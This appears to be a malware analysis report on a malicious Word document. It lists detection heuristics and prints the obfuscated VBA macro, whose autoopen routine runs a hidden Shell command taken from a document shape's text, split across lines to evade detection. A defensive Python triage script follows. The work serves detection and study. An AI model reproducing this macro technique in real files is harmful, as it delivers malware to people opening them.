Verdict: MALICIOUS
Risk score: 252
Heuristics: 9

- ClamAV: Doc.Malware.Generic-6776027-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6776027-0
- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- Potential Shell call in VBA [critical] (OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script (line continuations folded; the call is split across three source lines as "Interaction _", ". _", "Shell(...)"):
  . _ Shell(YcjIzjala, wqUwJhzwPw), zYjldr) Set qlXfvNzqIhYTmBfEzwvr = dufQiWbLdGuQWVIUOfrqkzv
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  Attribute VB_Customizable = True Sub autoopen() PCBADZFB
- Suspicious cmd.exe invocation with execution flag [high] (SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Note: the rule text says no VBA project was recovered, but the macros.bas artifact below shows one was extracted for this sample, so treat this finding as redundant with OLE_VBA_AUTOOPEN here.)
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All three are standard OOXML schema namespace URIs:
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6075 bytes |

SHA-256 (macros.bas): 8a631ec7d4f8d7c345a746ab895cf92cefd9ee994f1321c8730006de66b9d631

Detection (macros.bas, the extracted VBA source; the ClamAV hit above is on the parent document):
ClamAV: No threats found
Obfuscation or payload: likely. 157 of 189 identifiers look randomly generated (e.g. 'COWXhNcnWGrUaQzUMIiZJUaa'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script; comments marked with ' were added by the editor to flag the lines that do the work, everything else is verbatim):

```vb
Attribute VB_Name = "iuLbufz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-exec entry point: Word runs autoopen() when the document is opened.
Sub autoopen()
PCBADZFB
End Sub
Attribute VB_Name = "IuSmcPuhfz"
Function PCBADZFB()
' Suppress runtime errors so the junk arithmetic below (undefined names, Int() of Empty) never aborts the macro.
On Error Resume Next
Set PwVjQvCUZWRzNlpiiVGMLq = NpmlbURFiQCjvom
MzWmjcTifKEpJwCfY = HtiKbAHRiiKBtuvDuMpEcl
EFQPcvlOXKGjsnBYVi = tkXiRKtGCppUMWXaF / CLng(70176208) * 238680605 / Tan(207839924) + wUmqmOCPtoTZNrljbz - Cos(37523047) + (227044616 / Int(jZiquJUNwNlzszQknivqrJ))
Set UFjlWtDwZzhiXaYJIzQBhRi = OzXcStQXcLmwbzw
jpSJIhCOvTcSjoJCXcXYVb = fjJCMociIBiSszYzhvIh
QzqnCjZzcZQHKnawfqaTkURC = RDwdqdNujOlTOKECjj / CLng(183160193) * 90075435 / Tan(69138891) + MwABFiNOwjoRljaVmvDNi - Cos(162706774) + (265439018 / Int(RfVQBnpoLjqAcoYijRRF))
Set vabIchUOokviDoPojRhOZABX = ilBzGBvtwdiEdfYonlv
PZuUEPFCsauYEhuvSQhjAoHK = kDmJZlPGaKJrhsrwsBVj
AvkcWWDMwaRjnULS = SofSdWkEkXqnHnlbXjHBhCP / CLng(81666075) * 301966297 / Tan(195831203) + rHuXjdzjjDrXYAXlwNZpn - Cos(214941427) + (54403837 / Int(lDRLPZSYzmswqzJJH))
Set fqXjBUwIlQpjbUPSQ = ZQhVqUlklsYIzHz
VdiNmSwAtwrWOnpfAZ = rjJADzRjEjdShhGzlkCW
UjbscOVzDsHXcHn = dfPVisQQfJpHoEvw / CLng(20496882) * 161852658 / Tan(157084387) + hHaivmAqVvFaSnHEmBYbQLNS - Cos(167391525) + (91566191 / Int(zzIUDjodWEhawrZ))
Set HcwYsTqjhJCYKq = qGaZLtFQtzIVwnPH
DaDIDhiItJjTMlORrPrsibKB = DYkwstSCDVknDnZs
SjVwjNuDGXYPUbPBw = IwJAQRRJQdinbSANJbjOXLpu / CLng(249447752) * 139453457 / Tan(300275930) + itVlGnQuGRTEfXzRZTvGPH - Cos(119512991) + (263065495 / Int(hcwIPOvXiaXHshoBFG))
' The payload string is not in the macro: it is read from the text frame of a document shape.
' RQzUo and KzdmcLoTH are never assigned, so the shape name resolves to "HOmRtGGO".
Set XjMjA = iuLbufz.Shapes(RQzUo + "HOmRtGGO" + KzdmcLoTH).TextFrame
Set NIumUwRNLvZdhlWRNzfzWjW = ScqYzDdziTzYDjPwVz
CTFojYouNDRWdlXTsHsO = RauNlwNjjhcWGUD
oKzLJPvRzVmjMXqc = UktKauaaNiWoAXRTGDztD / CLng(335373583) * 14947063 / Tan(200534692) + QQMhTLrzllkJDOQZkwlZ - Cos(189527805) + (321761802 / Int(UNGTsjhVhPhJiNttSfpOlhJC))
Set OjluHcAwKNlFEQJPmzqw = kpPapRVsNNXqIoXsRIlSS
TDHSJXKuaTZtirVUSKfFzzOO = blWUrEiSkWLTXIziSnDROKjW
qbnNCTpsWhmoaiPvbtUJBuCh = iMKzhRFzXBdqEiCWaA / CLng(177942024) * 78401417 / Tan(301063771) + EoVmQLMwvZGqXGivoQjoDhl - Cos(27790818) + (149075983 / Int(SnaubVdmIVbuAtma))
' YcjIzjala becomes the shape's text (the command line); the appended names are all Empty.
YcjIzjala = XjMjA.ContainingRange + pWDRQ + OKvrfMK + ZVBzlMkw + IAXvvh + tPmBcb + YzlSJivB + LSvsDNv + EGzBa + HFVdaThv
Set imCwzHoOqnNnnN = jZvkFMhjVVRpczz
ViVQnFCNoZQmtjkCNnjG = vKnzCjafRMOrKsERwTaXivj
uqmlPboPskZYiTlZchXMBvjr = kRUIjKAisCMupQpXwwZS / CLng(207021482) * 232393330 / Tan(190987847) + BvAYTtzHvEiKUHJaZupQY - Cos(202096402) + (254719067 / Int(hpDwJYABolGoJcKwC))
Set vPqDNzTCWuwsiGErkBPt = qWhMtqGtRzjVKkUniLHtjN
CLzAKwovPIrFtJrTGNIEuRWT = kECpHADcYfBwqvvdER
TiaiqrAfaIClodiZ = lFHIocUdqXQRNbpzJArKZMz / CLng(47578288) * 133233159 / Tan(187063028) + WuMSLWBswKFiCFAAUk - Cos(91907108) + (88812723 / Int(MlidnPUZIAnLJwjdEEvMi))
Set zwJAmanRcwqcmnQ = uvWcJmDdGwCrzQvhXRFLfmFw
CKQszNlkXOLzmzNvfuqXvSM = IFUhERHpXiGcml
iRHbBjikUsQzsPb = kwPjstDfFGWbDqkIulHGoqKS / CLng(174943772) * 138210130 / Tan(340628232) + oSPZwkWdXBPoNbVuMGjdHH - Cos(30397534) + (44131973 / Int(UKtnwJXuNrnrwiT))
Set fJZjfCtrQKAdZsbmMpr = NhLCXdzcESjDJWUaJTk
TRjKKHOjVmKBwHKzwWL = CQmwbzTCYBctFR
vzAsQOPGSHiECMW = nIjXCfljMnMLUJRvjAO / CLng(341019248) * 327553242 / Tan(199117432) + nmKUqstRqBZpkWtEQMQfdCE - Cos(248530001) + (58262728 / Int(mXCzWiINwksKvqTVVJvUjZ))
Set BnJzdjrXGlJDmiWqtkJt = wWaOHsGUpOCFRoBzMHXHLrYn
PldEqOwihEQjlWr = CQXGwVtUrjcmlkFznGrGcQ
zFWjkkQblfWJaAjKurINJlKz = wTviikJlQYAblJkbFrGPbfzG / CLng(317800507) * 325152361 / Tan(101162874) + DqNvYmlRUzGvMXJcfi - Cos(55968535) + (227420794 / Int(mEuEiVTVoihUoiaKFDw))
Set cjHJUrThwBCzprG = osfvlroVtGQprL
jNLCVYsQUndiOF = msZXzncEWlsmQOaiqlzT
dokiwcKHIJZQQTYPTOQGJ = RdmbBtJnwRmrJDptALSwNb / CLng(124606625) * 145165899 / Tan(37782) + COWXhNcnWGrUaQzUMIiZJUaa - Cos(88213680) + (31511432 / Int(MbqKQbGrvRZjYOVhiBjlBz))
' Window style for the Shell call: 0 is vbHide, so the spawned process has no visible window.
Const wqUwJhzwPw = 0
Set UOTLzGOJPtNJSMQGh = OIcNmJXjJuFdwnBizK
DjPfnSSquLrKLjjwSnG = KnRwTDmvaHnPFjiqzcp
TSdUSkuuOqjqqiQPOSLkjXQ = XcFfEtwpwLIrJwijJshjYz / CLng(160147709) * 146603872 / Tan(106593796) + bhQEOwCrwpiOpUutr - Cos(205547716) + (175563086 / Int(FSncbnqjOaEjPpSPYuw))
Set orOOhEXatKkdPmDAj = VrlpIzJzUvRuhmjWuaMQ
GhEDzJCCLzNkNSAjwjQ = ikbJwdzzsscnTDO
hmInGwJzEJUTjqvr = LsWFvEWLEKSUZRJDqzMbcwmb / CLng(198261940) * 31069533 / Tan(266820330) + iRBzlrHKsElhlbBm - Cos(281792729) + (189435809 / Int(sKPpriPTNGvbqQMhnIVj))
' The execution primitive: Interaction.Shell(command, vbHide), split across three lines with
' " _" continuations so that "Interaction.Shell" never appears on one source line. Array() only
' serves to evaluate the call as an argument.
SzoEuCMp = Array(FtvrJJt, dbGVcWlv, ACiUziOjm, Interaction _
. _
Shell(YcjIzjala, wqUwJhzwPw), zYjldr)
Set qlXfvNzqIhYTmBfEzwvr = dufQiWbLdGuQWVIUOfrqkzv
SPkREfWYPpMqrOQrWffb = CQjWjkTDBGjzzwOlKHzj
BjIRdzOzTERTCQzEuU = DUNijrsQBGMXirHAjXEFkEE / CLng(224312938) * 11229359 / Tan(98766844) + ziPjPmCjBowcaljMsGhj - Cos(186451282) + (305399042 / Int(PjqOKwQfjRMvimazl))
Set KILYHttqZhTmzbCJ = RSaEipIjVdBLODnZczjRY
NmfGzdqWKkbYBiBIb = CslQrfLijNWdVrLBEn
cqfpwSRjpCEXUWNPjdz = AuVwdzhPkNzdNjwcWDnwavVb / CLng(183168760) * 276490999 / Tan(16637324) + HcfXHsYhUjLwlBz - Cos(185305828) + (17961825 / Int(JlXksdqzVEZtUnzaHHh))
Set lJsPmaYNncWDTkQf = RsSYclPPUONdjc
EFZEzlnsliQoRzLAuOIo = moJXdARLKjDArzOL
hOiAjpLwwQJOTObo = SRQjTlWjawNoZzzpi / CLng(215988150) * 299748797 / Tan(67198228) + FwzbfkIzrUbMYhwu - Cos(212523393) + (92991688 / Int(IUGqwHYQLZliidHMTSEo))
Set wowPmjUhaMAGQJScV = fcpzccAShQBZbwXrZB
AKGIwSoaBLLafOLjjazMUPTC = fBkBjYjQfVKZUt
oBzHVpVKPRqRZpdkqEFQ = DYSmbJAtBHMjVYSPM / CLng(214863998) * 90962107 / Tan(64592653) + UksHKbCkTUPcNkdjUufVQOJ - Cos(196519453) + (242295764 / Int(RKUiXrGainZfRi))
End Function
```
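The two findings that matter in this report, the split Shell call and the name-mangling score, both come down to simple static checks over the decoded VBA source. The script below is an added example written for this page, not the analyzer's own rule code: it folds VBA " _" line continuations (so "Interaction _ / . _ / Shell(" is seen as one call, which a line-by-line grep for "Interaction.Shell" misses), finds auto-exec entry points, resolves the Shell window-style constant (0 is vbHide), lists the document shapes whose text the macro reads (where the real command line lives, since it is not in the macro), and scores identifiers for randomness. The randomness heuristic (consonant runs and case flips) is this example's own approximation, not the analyzer's rule, and the SAMPLE_VBA excerpt is constructed from the load-bearing lines of the preview above with the junk arithmetic dropped.

```python
import re

# Constructed excerpt of the macro shown in this report: the lines that carry the
# behaviour, with the junk arithmetic between them left out. It is not the full artifact.
SAMPLE_VBA = '''Attribute VB_Name = "iuLbufz"
Sub autoopen()
PCBADZFB
End Sub
Function PCBADZFB()
On Error Resume Next
Set PwVjQvCUZWRzNlpiiVGMLq = NpmlbURFiQCjvom
EFQPcvlOXKGjsnBYVi = tkXiRKtGCppUMWXaF / CLng(70176208) * 238680605 / Tan(207839924)
Set XjMjA = iuLbufz.Shapes(RQzUo + "HOmRtGGO" + KzdmcLoTH).TextFrame
YcjIzjala = XjMjA.ContainingRange + pWDRQ + OKvrfMK
Const wqUwJhzwPw = 0
SzoEuCMp = Array(FtvrJJt, dbGVcWlv, ACiUziOjm, Interaction _
. _
Shell(YcjIzjala, wqUwJhzwPw), zYjldr)
End Function
'''

# Keywords and object-model names that must not be scored as author-chosen identifiers.
VBA_RESERVED = {
    "attribute", "sub", "function", "end", "on", "error", "resume", "next", "set",
    "const", "dim", "as", "if", "then", "else", "for", "to", "each", "in", "do",
    "loop", "call", "exit", "private", "public", "true", "false", "nothing", "array",
    "shell", "interaction", "shapes", "textframe", "containingrange", "clng", "cint",
    "tan", "cos", "sin", "int", "len", "mid", "chr", "createobject", "thisdocument",
    "activedocument", "string", "integer", "long", "variant", "object",
}
VOWELS = set("aeiouAEIOU")

CONTINUATION = re.compile(r"[ \t]*_[ \t]*\r?\n[ \t]*")   # VBA " _" line continuation
STRING_LIT = re.compile(r'"([^"]*)"')
IDENT = re.compile(r"\b[A-Za-z][A-Za-z0-9_]*\b")
AUTOEXEC = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+"
    r"(auto_?open|auto_?close|auto_?exec|document_open|workbook_open)\b",
    re.I | re.M,
)
SHELL_CALL = re.compile(r"\b(?:Interaction\s*\.\s*)?Shell\s*\(([^)]*)\)", re.I)
SHAPE_REF = re.compile(r"\.Shapes\s*\(([^)]*)\)", re.I)
CONST_DEF = re.compile(r"^\s*Const\s+(\w+)\s*=\s*(\d+)", re.I | re.M)


def join_continuations(src: str) -> str:
    """Fold ' _' continuations so tokens split across lines (Interaction _ / . _ / Shell) rejoin."""
    return CONTINUATION.sub(" ", src)


def looks_generated(name: str) -> bool:
    """Crude name-mangling heuristic (an assumption of this example, not the analyzer's rule):
    a run of five or more consonants, or at least three upper/lower case flips in a
    name of five or more characters. Human-chosen names rarely do either."""
    if "_" in name:
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    longest = run = 0
    for ch in name:
        run = 0 if ch in VOWELS else run + 1
        longest = max(longest, run)
    return longest >= 5 or (len(name) >= 5 and flips >= 3)


def triage(src: str) -> dict:
    """Pull the indicators an analyst wants first: auto-exec entry points, Shell calls
    with their resolved window style, document shapes the macro reads text from, and
    the share of identifiers that look machine-generated."""
    joined = join_continuations(src)
    consts = {m.group(1): int(m.group(2)) for m in CONST_DEF.finditer(joined)}
    shell_calls, window_styles = [], []
    for m in SHELL_CALL.finditer(joined):
        shell_calls.append(m.group(0))
        args = [a.strip() for a in m.group(1).split(",")]
        # Second Shell argument is the window style; 0 is vbHide.
        window_styles.append(consts.get(args[1]) if len(args) > 1 else None)
    shape_names = [s for m in SHAPE_REF.finditer(joined) for s in STRING_LIT.findall(m.group(1))]
    code = STRING_LIT.sub('""', joined)   # literal contents are not identifiers
    names = set()
    for line in code.splitlines():
        if line.startswith("Attribute "):
            continue
        names.update(t for t in IDENT.findall(line) if t.lower() not in VBA_RESERVED)
    generated = [n for n in names if looks_generated(n)]
    return {
        "autoexec": [m.group(1) for m in AUTOEXEC.finditer(joined)],
        "shell_calls": shell_calls,
        "shell_window_styles": window_styles,
        "shape_names": shape_names,
        "generated_identifiers": len(generated),
        "total_identifiers": len(names),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

On the excerpt this reports autoopen as the entry point, one Shell call with window style 0, the shape name "HOmRtGGO", and 16 of 19 identifiers flagged as generated. The practical follow-up is to dump the text of that shape from the document itself (for example with oletools or by walking the Word binary), because the command line the SC_STR_CMD heuristic keys on is stored there, not in macros.bas.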